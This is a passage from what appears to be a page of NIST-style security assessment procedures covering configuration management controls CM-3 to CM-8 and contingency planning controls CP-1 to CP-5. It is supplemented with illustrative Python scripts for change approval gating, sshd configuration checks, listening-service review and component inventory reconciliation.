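        return [cid for cid, cr in self.requests.items()
                if cr.completed_at is None and cr.missing_approvals()
                and now - cr.submitted_at > APPROVAL_WINDOW]

    def apply(self, change_id: str, implementer: str, now: datetime) -> bool:
        """(iv) inhibit the change until all approvals exist and the implementer is
        authorized (CM-5); (v) document the completed change."""
        cr = self.requests[change_id]
        missing = cr.missing_approvals()
        if missing:
            self._record(now, f"DENIED {change_id}: awaiting {sorted(missing)}")
            return False
        if implementer not in AUTHORIZED_IMPLEMENTERS:
            self._record(now, f"DENIED {change_id}: {implementer} not authorized")
            return False
        cr.implemented_by, cr.completed_at = implementer, now
        self._record(now, f"COMPLETED {change_id} by {implementer}")
        return True


def run_scenario() -> tuple[ChangeControl, dict[str, object]]:
    """Scripted walk-through with constructed timestamps; returns the gate and outcomes."""
    cc = ChangeControl()
    t0 = datetime(2024, 1, 8, 9, 0)
    cc.propose("CR-1001", "Disable vsftpd on web-01", "sysadmin-a", t0)
    out: dict[str, object] = {}
    out["early_apply"] = cc.apply("CR-1001", "sysadmin-a", t0 + timedelta(hours=1))     # no approvals yet
    out["requester_approve"] = cc.approve("CR-1001", "sysadmin-a", t0 + timedelta(hours=2))
    cc.approve("CR-1001", "ccb-chair", t0 + timedelta(hours=3))
    out["overdue_day3"] = cc.overdue(t0 + timedelta(days=3))   # security-officer still silent
    cc.approve("CR-1001", "security-officer", t0 + timedelta(days=3, hours=2))
    out["unauthorized_apply"] = cc.apply("CR-1001", "contractor-x", t0 + timedelta(days=3, hours=4))
    out["final_apply"] = cc.apply("CR-1001", "sysadmin-b", t0 + timedelta(days=3, hours=5))
    return cc, out


if __name__ == "__main__":
    gate, outcomes = run_scenario()
    print(outcomes)
    print("\n".join(gate.audit_log))
```

When testing CM-3(1).1 and CM-5(1).1, the assessor is interested in the two denials as much as the completion: the gate refused the change before approvals existed and refused an unauthorized implementer even after approvals were complete, and both refusals appear in the retained log that CM-5(ii) asks the organization to review.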


ASSESSMENT PROCEDURE
CM-6 CONFIGURATION SETTINGS
Control: The organization: (i) establishes mandatory configuration settings for information technology products employed within the information system; (ii) configures the security settings of information technology products to the most restrictive mode consistent with operational requirements; (iii) documents the configuration settings; and (iv) enforces the configuration settings in all components of the information system.
Supplemental Guidance: Configuration settings are the configurable parameters of the information technology products that compose the information system. Organizations monitor and control changes to the configuration settings in accordance with organizational policies and procedures. OMB FISMA reporting instructions provide guidance on configuration requirements for federal information systems. NIST Special Publication 800-70 provides guidance on producing and using configuration settings for information technology products employed in organizational information systems. Related security controls: CM-2, CM-3, SI-4.
CM-6.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization establishes mandatory configuration settings for information technology products employed within the information system;
(ii) the organization configures the security settings of information technology products to the most restrictive mode consistent with operational requirements;
(iii) the organization documents the configuration settings;
(iv) the organization enforces the configuration settings in all components of the information system; and
(v) the organization monitors and controls changes to the configuration settings in accordance with organizational policies and procedures.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing configuration settings for the information system; information system configuration settings and associated documentation; NIST Special Publication 800-70; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with security configuration responsibilities]. (M) (H)
CM-6(1) CONFIGURATION SETTINGS
Control Enhancement:
The organization employs automated mechanisms to centrally manage, apply, and verify configuration settings.
CM-6(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to centrally manage, apply, and verify configuration settings.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing configuration settings for the information system; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing the centralized management, application, and verification of configuration settings]. (H)
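As an added example of how an assessor, or an automated mechanism under CM-6(1), can verify that documented mandatory settings are actually in force (and, after a change, that they still are, which is the post-change check CM-4 calls for), the Python below parses an sshd_config-style keyword/value file and compares each mandatory keyword against an assumed organization-defined set of restrictive values. It is illustrative code written for this page, not NIST's text and not OpenSSH's; the two sample configurations and the required values are constructed.

```python
"""Mandatory configuration settings check (CM-6 / CM-6(1)) for a keyword-value config.
Added example for this page; not NIST text. Sample configs and requirements are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass


@dataclass(frozen=True)
class Requirement:
    """One mandatory setting: either an exact set of allowed values or an integer ceiling."""
    allowed: frozenset[str] | None = None
    max_int: int | None = None

    def satisfied_by(self, value: str) -> bool:
        if self.allowed is not None:
            return value.lower() in self.allowed
        if self.max_int is not None:
            return value.isdigit() and int(value) <= self.max_int
        return False

    def describe(self) -> str:
        if self.allowed is not None:
            return "one of " + "/".join(sorted(self.allowed))
        return f"<= {self.max_int}"


# Assumed organization-defined mandatory values ("most restrictive mode consistent with
# operational requirements"); a real set would come from the security plan / checklist.
MANDATORY = {
    "PermitRootLogin": Requirement(allowed=frozenset({"no"})),
    "PasswordAuthentication": Requirement(allowed=frozenset({"no"})),
    "PermitEmptyPasswords": Requirement(allowed=frozenset({"no"})),
    "X11Forwarding": Requirement(allowed=frozenset({"no"})),
    "MaxAuthTries": Requirement(max_int=4),
}


@dataclass(frozen=True)
class Finding:
    keyword: str
    observed: str | None   # None when the keyword is not set at all
    required: str


def parse_config(text: str) -> dict[str, str]:
    """Keyword/value pairs; full-line '#' comments are skipped. The FIRST occurrence of
    a keyword wins, which is how sshd resolves duplicates, so a permissive line placed
    above a restrictive one is the effective setting."""
    settings: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        settings.setdefault(parts[0], parts[1].strip())
    return settings


def check_settings(text: str, mandatory: dict[str, Requirement] = MANDATORY) -> list[Finding]:
    """One finding per mandatory keyword that is absent or non-compliant. An absent keyword
    is a finding because the baseline requires the value to be set explicitly."""
    settings = parse_config(text)
    findings = []
    for keyword, req in mandatory.items():
        observed = settings.get(keyword)
        if observed is None or not req.satisfied_by(observed):
            findings.append(Finding(keyword, observed, req.describe()))
    return findings


# Constructed sample: a host as found before remediation ...
OBSERVED_CONFIG = """\
# sshd_config (constructed sample)
Port 22
PermitRootLogin yes
PermitRootLogin no
PasswordAuthentication no
X11Forwarding yes
MaxAuthTries 10
"""

# ... and after the change, re-checked to confirm the security features still hold (CM-4).
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
X11Forwarding no
MaxAuthTries 4
"""

if __name__ == "__main__":
    for f in check_settings(OBSERVED_CONFIG):
        print(f"{f.keyword}: observed={f.observed!r}, required {f.required}")
    print("hardened findings:", check_settings(HARDENED_CONFIG))
```

The duplicated PermitRootLogin line is the case worth noticing: a grep for "PermitRootLogin no" would pass the host, but the effective value is "yes" because the daemon takes the first occurrence, so the checker has to model the product's own precedence rule rather than just search for the compliant string.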


ASSESSMENT PROCEDURE
CM-7 LEAST FUNCTIONALITY
Control: The organization configures the information system to provide only essential capabilities and specifically prohibits and/or restricts the use of the following functions, ports, protocols, and/or services: [Assignment: organization-defined list of prohibited and/or restricted functions, ports, protocols, and/or services].
Supplemental Guidance: Information systems are capable of providing a wide variety of functions and services. Some of the functions and services, provided by default, may not be necessary to support essential organizational operations (e.g., key missions, functions). Additionally, it is sometimes convenient to provide multiple services from a single component of an information system, but doing so increases risk over limiting the services provided by any one component. Where feasible, the organization limits component functionality to a single function per device (e.g., email server or web server, not both). The functions and services provided by information systems, or individual components of information systems, are carefully reviewed to determine which functions and services are candidates for elimination (e.g., Voice Over Internet Protocol, Instant Messaging, File Transfer Protocol, Hyper Text Transfer Protocol, file sharing).
CM-7.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, prohibited or restricted functions, ports, protocols, and services for the information system;
(ii) the organization configures the information system to provide only essential capabilities; and
(iii) the organization configures the information system to specifically prohibit and/or restrict the use of organization-defined functions, ports, protocols, and/or services.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing least functionality in the information system; security plan; information system configuration settings and associated documentation; other relevant documents or records]. (M) (H)
Test: [SELECT FROM: Information system for disabling or restriction of functions, ports, protocols, and services]. (H)
CM-7(1) LEAST FUNCTIONALITY
Control Enhancement:
The organization reviews the information system [Assignment: organization-defined frequency], to identify and eliminate unnecessary functions, ports, protocols, and/or services.
CM-7(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the frequency of the information system reviews to identify and eliminate unnecessary functions, ports, protocols, and services; and
(ii) the organization reviews the information system to identify and eliminate unnecessary functions, ports, protocols, and/or services in accordance with organization-defined frequency.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing least functionality in the information system; security plan; information system configuration settings and associated documentation; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for identifying and eliminating unnecessary functions, ports, protocols, and services on the information system]. (H)
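CM-7.1 is tested by checking the live system's listening services against the organization-defined essential and prohibited lists. The Python below is an added example (not NIST's text and not any tool's code) that parses socket-listing rows in the style of `ss -lntup` output and classifies each listener as allowed, prohibited, or unapproved. The listing rows, the essential allowlist and the prohibited list are all constructed for the example; a real review would run the parser over the actual `ss` output and take both lists from the security plan.

```python
"""Least functionality check (CM-7): listening services vs. organization-defined lists.
Added example for this page; not NIST text. Socket listing and policy lists are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

PROCESS_RE = re.compile(r'users:\(\("([^"]+)"')


@dataclass(frozen=True)
class Listener:
    proto: str      # "tcp" or "udp"
    address: str    # bind address as printed
    port: int
    process: str    # process name, or "?" if the listing does not show one


def parse_ss_line(line: str) -> Listener | None:
    """Parse one row of `ss -lntup`-style output (no header). Handles IPv6 '[::]:port'."""
    fields = line.split()
    if len(fields) < 5:
        return None
    proto, local = fields[0], fields[4]
    address, _, port = local.rpartition(":")
    if not port.isdigit():
        return None
    m = PROCESS_RE.search(line)
    return Listener(proto, address, int(port), m.group(1) if m else "?")


# Assumed organization-defined policy (CM-7.1 (i)); a real list comes from the security plan.
# The allowlist pins the expected process as well as the port.
ESSENTIAL = {("tcp", 22): "sshd", ("tcp", 80): "nginx", ("tcp", 443): "nginx"}
PROHIBITED = {("tcp", 21): "FTP", ("tcp", 23): "telnet", ("udp", 5060): "VoIP/SIP",
              ("tcp", 5222): "Instant Messaging/XMPP", ("tcp", 445): "file sharing/SMB"}


def classify(listeners: list[Listener]) -> dict[str, list[str]]:
    """Bucket each listener: allowed (essential, expected process), prohibited, or unapproved."""
    report: dict[str, list[str]] = {"allowed": [], "prohibited": [], "unapproved": []}
    for ln in listeners:
        key = (ln.proto, ln.port)
        label = f"{ln.proto}/{ln.port} {ln.process} on {ln.address}"
        if key in PROHIBITED:
            report["prohibited"].append(f"{label} ({PROHIBITED[key]})")
        elif key in ESSENTIAL and ESSENTIAL[key] == ln.process:
            report["allowed"].append(label)
        else:
            report["unapproved"].append(label)  # not on the essential list, or wrong process
    return report


# Constructed `ss -Hlntup`-style output (header suppressed); not from any real host.
SAMPLE_SS_OUTPUT = """\
tcp   LISTEN 0      128          0.0.0.0:22        0.0.0.0:*    users:(("sshd",pid=812,fd=3))
tcp   LISTEN 0      128             [::]:22           [::]:*    users:(("sshd",pid=812,fd=4))
tcp   LISTEN 0      511          0.0.0.0:80        0.0.0.0:*    users:(("nginx",pid=1020,fd=6))
tcp   LISTEN 0      5            0.0.0.0:21        0.0.0.0:*    users:(("vsftpd",pid=1200,fd=4))
udp   UNCONN 0      0            0.0.0.0:5060      0.0.0.0:*    users:(("asterisk",pid=1300,fd=9))
tcp   LISTEN 0      100        127.0.0.1:25        0.0.0.0:*    users:(("master",pid=900,fd=13))
tcp   LISTEN 0      128          0.0.0.0:443       0.0.0.0:*    users:(("python3",pid=1500,fd=5))
"""


def review(ss_output: str = SAMPLE_SS_OUTPUT) -> dict[str, list[str]]:
    listeners = [ln for ln in map(parse_ss_line, ss_output.splitlines()) if ln]
    return classify(listeners)


if __name__ == "__main__":
    for bucket, items in review().items():
        print(bucket.upper())
        for item in items:
            print("  ", item)
```

Two points a practitioner would want in such a check: a loopback-only listener (port 25 above) is still reported, because CM-7 asks which functions are essential, not only which are reachable from outside; and an approved port bound by an unexpected process (443 served by python3 instead of nginx) is flagged as unapproved, which catches an ad hoc test server squatting on a permitted port.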


ASSESSMENT PROCEDURE
CM-8 INFORMATION SYSTEM COMPONENT INVENTORY
Control: The organization develops, documents, and maintains a current inventory of the components of the information system and relevant ownership information.
Supplemental Guidance: The organization determines the appropriate level of granularity for the information system components included in the inventory that are subject to management control (i.e., tracking, and reporting). The inventory of information system components includes any information determined to be necessary by the organization to achieve effective property accountability (e.g., manufacturer, model number, serial number, software license information, system/component owner). The component inventory is consistent with the accreditation boundary of the information system. Related security controls: CM-2, CM-6.
CM-8.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents an inventory of the components of the information system:
  • that is at the level of granularity deemed appropriate by the organization for the components included in the inventory that are subject to tracking and reporting;
  • that includes any information determined to be necessary by the organization to achieve effective property accountability; and
  • that is consistent with the accreditation boundary of the system; and
(ii) the organization maintains the inventory of the components of the information system to reflect the current state of the system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing information system component inventory; information system inventory records; other relevant documents or records]. (L) (M) (H)
CM-8(1) INFORMATION SYSTEM COMPONENT INVENTORY
Control Enhancement:
The organization updates the inventory of information system components as an integral part of component installations.
CM-8(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization updates the inventory of information system components as an integral part of component installations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing information system component inventory; information system inventory records; component installation records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system installation and inventory responsibilities]. (H)
CM-8(2) INFORMATION SYSTEM COMPONENT INVENTORY
Control Enhancement:
The organization employs automated mechanisms to help maintain an up-to-date, complete, accurate, and readily available inventory of information system components.
CM-8(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to help maintain an up-to-date, complete, accurate, and readily available inventory of information system components.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing information system component inventory; information system design documentation; information system inventory records; component installation records; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing information system component inventory management]. (H)
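To make CM-8(2)'s "automated mechanisms" concrete, here is an added Python example (not NIST's text and not any asset-management product's code) that reconciles the documented component inventory against what a discovery scan or agent actually reported: components seen inside the accreditation boundary but absent from the inventory, inventory entries no longer observed, entries lacking the accountability data the organization requires, and observations that fall outside the boundary. The inventory rows, scan results, boundary network and required fields are all constructed sample values.

```python
"""Component inventory reconciliation (CM-8 / CM-8(2)). Added example for this page;
not NIST text. Inventory rows, scan results and the boundary definition are constructed.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass

# Assumed organization-defined values.
REQUIRED_FIELDS = ("owner", "manufacturer", "model", "serial")   # property accountability
ACCREDITATION_BOUNDARY = [ipaddress.ip_network("10.20.0.0/24")]  # networks inside the boundary


@dataclass(frozen=True)
class Observed:
    mac: str
    ip: str
    hostname: str


def inside_boundary(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ACCREDITATION_BOUNDARY)


def reconcile(inventory: list[dict[str, str]], scan: list[Observed]) -> dict[str, list[str]]:
    """Compare the inventory (keyed by MAC) with discovery results inside the boundary."""
    by_mac = {row["mac"].lower(): row for row in inventory}
    seen = {o.mac.lower(): o for o in scan if inside_boundary(o.ip)}
    out: dict[str, list[str]] = {"unknown": [], "not_observed": [], "incomplete": [],
                                 "out_of_boundary": []}
    for o in scan:
        if not inside_boundary(o.ip):
            out["out_of_boundary"].append(f"{o.hostname} {o.ip}")  # inventory is scoped to the boundary
    for mac, o in seen.items():
        if mac not in by_mac:
            out["unknown"].append(f"{o.hostname} {o.ip} {mac}")   # on the network, not inventoried
    for mac, row in by_mac.items():
        if mac not in seen:
            out["not_observed"].append(row["hostname"])          # stale entry or device offline
        missing = [f for f in REQUIRED_FIELDS if not row.get(f)]
        if missing:
            out["incomplete"].append(f"{row['hostname']}: missing {missing}")
    return out


# Constructed inventory records (documented state) ...
INVENTORY = [
    {"hostname": "web-01", "mac": "00:1A:2B:3C:4D:01", "owner": "web-team",
     "manufacturer": "Dell", "model": "R650", "serial": "SN-0001"},
    {"hostname": "db-01", "mac": "00:1a:2b:3c:4d:02", "owner": "dba-team",
     "manufacturer": "Dell", "model": "R650", "serial": "SN-0002"},
    {"hostname": "old-print", "mac": "00:1a:2b:3c:4d:03", "owner": "",
     "manufacturer": "HP", "model": "", "serial": "SN-0003"},
]
# ... and constructed discovery-scan results (observed state).
SCAN = [
    Observed("00:1a:2b:3c:4d:01", "10.20.0.11", "web-01"),
    Observed("00:1a:2b:3c:4d:02", "10.20.0.12", "db-01"),
    Observed("a4:83:e7:00:00:99", "10.20.0.57", "unknown-laptop"),   # never inventoried
    Observed("00:1a:2b:3c:4d:10", "192.168.50.8", "lab-box"),        # outside the boundary
]


def run_reconciliation() -> dict[str, list[str]]:
    return reconcile(INVENTORY, SCAN)


if __name__ == "__main__":
    for bucket, items in run_reconciliation().items():
        print(bucket, items)
```

The "unknown" bucket is the security-relevant output for CM-8(2).1: a component on the accredited network with no inventory record has no owner, no baseline and no one patching it. The "incomplete" bucket maps to the supplemental guidance's property-accountability fields, and MAC addresses are normalized to lower case before comparison so that case differences between the inventory and the scanner do not manufacture false "unknown" entries.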


FAMILY: Contingency Planning


ASSESSMENT PROCEDURE
CP-1 CONTINGENCY PLANNING POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, contingency planning policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the contingency planning policy and associated contingency planning controls.
Supplemental Guidance: The contingency planning policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The contingency planning policy can be included as part of the general information security policy for the organization. Contingency planning procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-34 provides guidance on contingency planning. NIST Special Publication 800-12 provides guidance on security policies and procedures.
CP-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents contingency planning policy and procedures;
(ii) the organization disseminates contingency planning policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review contingency planning policy and procedures; and
(iv) the organization updates contingency planning policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with contingency planning responsibilities]. (H)
CP-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the contingency planning policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the contingency planning policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the contingency planning procedures address all areas identified in the contingency planning policy and address achieving policy-compliant implementations of all associated contingency planning controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with contingency planning responsibilities]. (H)


ASSESSMENT PROCEDURE
CP-2 CONTINGENCY PLAN
Control: The organization develops and implements a contingency plan for the information system addressing contingency roles, responsibilities, assigned individuals with contact information, and activities associated with restoring the system after a disruption or failure. Designated officials within the organization review and approve the contingency plan and distribute copies of the plan to key contingency personnel.
Supplemental Guidance: None.
CP-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents a contingency plan for the information system;
(ii) the contingency plan is consistent with NIST Special Publication 800-34;
(iii) the contingency plan addresses contingency roles, responsibilities, assigned individuals with contact information, and activities associated with restoring the information system after a disruption or failure;
(iv) the contingency plan is reviewed and approved by designated organizational officials; and
(v) the organization disseminates the contingency plan to key contingency personnel.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; procedures addressing contingency operations for the information system; NIST Special Publication 800-34; contingency plan; other relevant documents or records]. (L) (M) (H)
CP-2(1) CONTINGENCY PLAN
Control Enhancement:
The organization coordinates contingency plan development with organizational elements responsible for related plans.
Enhancement Supplemental Guidance: Examples of related plans include Business Continuity Plan, Disaster Recovery Plan, Continuity of Operations Plan, Business Recovery Plan, Incident Response Plan, and Emergency Action Plan.
CP-2(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization coordinates the contingency plan with other related plans (e.g., Business Continuity Plan, Disaster Recovery Plan, Continuity of Operations Plan, Business Recovery Plan, Incident Response Plan, Emergency Action Plan).
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; procedures addressing contingency operations for the information system; contingency plan; other related plans; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with contingency planning and plan implementation responsibilities and responsibilities in related plan areas]. (M) (H)
CP-2(2) CONTINGENCY PLAN
Control Enhancement:
The organization conducts capacity planning so that necessary capacity for information processing, telecommunications, and environmental support exists during crisis situations.
CP-2(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization conducts capacity planning so that necessary capacity for information processing, telecommunications, and environmental support exists during crisis situations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; procedures addressing contingency operations for the information system; contingency plan; capacity planning documents; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with contingency planning and plan implementation responsibilities]. (H)


ASSESSMENT PROCEDURE
CP-3 CONTINGENCY TRAINING
Control: The organization trains personnel in their contingency roles and responsibilities with respect to the information system and provides refresher training [Assignment: organization-defined frequency, at least annually].
Supplemental Guidance: None.
CP-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization provides contingency training to personnel with contingency roles and responsibilities;
(ii) the organization defines in the security plan, explicitly or by reference, the frequency of refresher contingency training and the frequency is at least annually; and
(iii) the organization provides initial training and refresher training in accordance with organization-defined frequency.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency training; contingency training curriculum; contingency training material; security plan; contingency training records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with contingency planning, plan implementation, and training responsibilities]. (H)
CP-3.2 ASSESSMENT OBJECTIVE:
Determine if contingency training material addresses the procedures and activities necessary to fulfill identified organizational contingency roles and responsibilities.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency training; contingency training curriculum; contingency training material; other relevant documents or records]. (M) (H)
CP-3(1) CONTINGENCY TRAINING
Control Enhancement:
The organization incorporates simulated events into contingency training to facilitate effective response by personnel in crisis situations.
CP-3(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization incorporates simulated events into contingency training; and
(ii) the incorporation of simulated events into contingency training facilitates effective response by personnel in crisis situations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency training; contingency training curriculum; contingency training material; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with contingency planning, plan implementation, and training responsibilities]. (H)
CP-3(2) CONTINGENCY TRAINING
Control Enhancement:
The organization employs automated mechanisms to provide a more thorough and realistic training environment.
CP-3(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms that provide a more thorough and realistic contingency training environment.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency training; automated mechanisms supporting contingency training; contingency training curriculum; contingency training material; other relevant documents or records].
Interview: [SELECT FROM: Organizational personnel with contingency planning, plan implementation, and training responsibilities].


ASSESSMENT PROCEDURE
CP-4 CONTINGENCY PLAN TESTING AND EXERCISES
Control: The organization: (i) tests and/or exercises the contingency plan for the information system [Assignment: organization-defined frequency, at least annually] using [Assignment: organization-defined tests and/or exercises] to determine the plan's effectiveness and the organization's readiness to execute the plan; and (ii) reviews the contingency plan test/exercise results and initiates corrective actions.
Supplemental Guidance: There are several methods for testing and/or exercising contingency plans to identify potential weaknesses (e.g., full-scale contingency plan testing, functional/tabletop exercises). The depth and rigor of contingency plan testing and/or exercises increases with the FIPS 199 impact level of the information system. Contingency plan testing and/or exercises also include a determination of the effects on organizational operations and assets (e.g., reduction in mission capability) and individuals arising due to contingency operations in accordance with the plan. NIST Special Publication 800-84 provides guidance on test, training, and exercise programs for information technology plans and capabilities.
CP-4.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the contingency plan tests and/or exercises to be conducted;
(ii) the organization defines in the security plan, explicitly or by reference, the frequency of contingency plan tests and/or exercises and the frequency is at least annually;
(iii) the organization tests/exercises the contingency plan using organization-defined tests/exercises in accordance with organization-defined frequency; and
(iv) the organization reviews the contingency plan test/exercise results and takes corrective actions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency plan testing and exercises; security plan; contingency plan testing and/or exercise documentation; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with responsibilities for reviewing or responding to contingency plan tests/exercises]. (M) (H)
CP-4.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the contingency plan tests/exercises confirm the plan's effectiveness;
(ii) the contingency plan tests/exercises confirm the organization's readiness to execute the plan; and
(iii) the contingency plan tests/exercises confirm the effects on organizational operations and assets (e.g., reduction in mission capability) and individuals arising due to contingency operations in accordance with the plan.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency plan testing and exercises; contingency plan testing and/or exercise documentation; contingency plan test results; other relevant documents or records]. (L) (M) (H)
CP-4(1) CONTINGENCY PLAN TESTING AND EXERCISES
Control Enhancement:
The organization coordinates contingency plan testing and/or exercises with organizational elements responsible for related plans.
Enhancement Supplemental Guidance: Examples of related plans include Business Continuity Plan, Disaster Recovery Plan, Continuity of Operations Plan, Business Recovery Plan, Incident Response Plan, and Emergency Action Plan.
CP-4(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization coordinates contingency plan testing and/or exercises with organizational elements responsible for related plans (e.g., Business Continuity Plan, Disaster Recovery Plan, Continuity of Operations Plan, Business Recovery Plan, Incident Response Plan, Emergency Action Plan).
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency plan testing and exercises; contingency plan testing and/or exercise documentation; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with contingency planning, plan implementation, and testing responsibilities]. (M) (H)
CP-4(2) CONTINGENCY PLAN TESTING AND EXERCISES
Control Enhancement:
The organization tests/exercises the contingency plan at the alternate processing site to familiarize contingency personnel with the facility and available resources and to evaluate the site's capabilities to support contingency operations.
CP-4(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization conducts contingency plan testing at the alternate processing site to familiarize contingency personnel with the facility and its resources and to evaluate the site's capabilities to support contingency operations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency plan testing and exercises; contingency plan testing and/or exercise documentation; contingency plan test results; other relevant documents or records]. (H)
CP-4(3) CONTINGENCY PLAN TESTING AND EXERCISES
Control Enhancement:
The organization employs automated mechanisms to more thoroughly and effectively test/exercise the contingency plan by providing more complete coverage of contingency issues, selecting more realistic test/exercise scenarios and environments, and more effectively stressing the information system and supported missions.
CP-4(3).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to more thoroughly and effectively test/exercise the contingency plan by providing more complete coverage of contingency issues, selecting more realistic test/exercise scenarios and environments, and more effectively stressing the information system and supported missions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency plan testing and exercises; automated mechanisms supporting contingency plan testing/exercises; contingency plan testing and/or exercise documentation; other relevant documents or records].


ASSESSMENT PROCEDURE
CP-5 CONTINGENCY PLAN UPDATE
Control: The organization reviews the contingency plan for the information system [Assignment: organization-defined frequency, at least annually] and revises the plan to address system/organizational changes or problems encountered during plan implementation, execution, or testing.
Supplemental Guidance: Organizational changes include changes in mission, functions, or business processes supported by the information system. The organization communicates changes to appropriate organizational elements responsible for related plans (e.g., Business Continuity Plan, Disaster Recovery Plan, Continuity of Operations Plan, Business Recovery Plan, Incident Response Plan, Emergency Action Plan).
CP-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the frequency of contingency plan reviews and updates and the frequency is at least annually;
(ii) the organization reviews the contingency plan in accordance with organization-defined frequency; and
(iii) the organization updates the contingency plan as necessary to address the system/organizational changes identified by the organization or any problems encountered by the organization during plan implementation, execution, and testing.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Contingency planning policy; contingency plan; procedures addressing contingency plan reviews and updates; security plan; other relevant documents or records]. (L) (M) (H)
CP-5.2 ASSESSMENT OBJECTIVE:
Determine if the organization communicates necessary changes to the contingency plan to other organizational elements with related plans.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
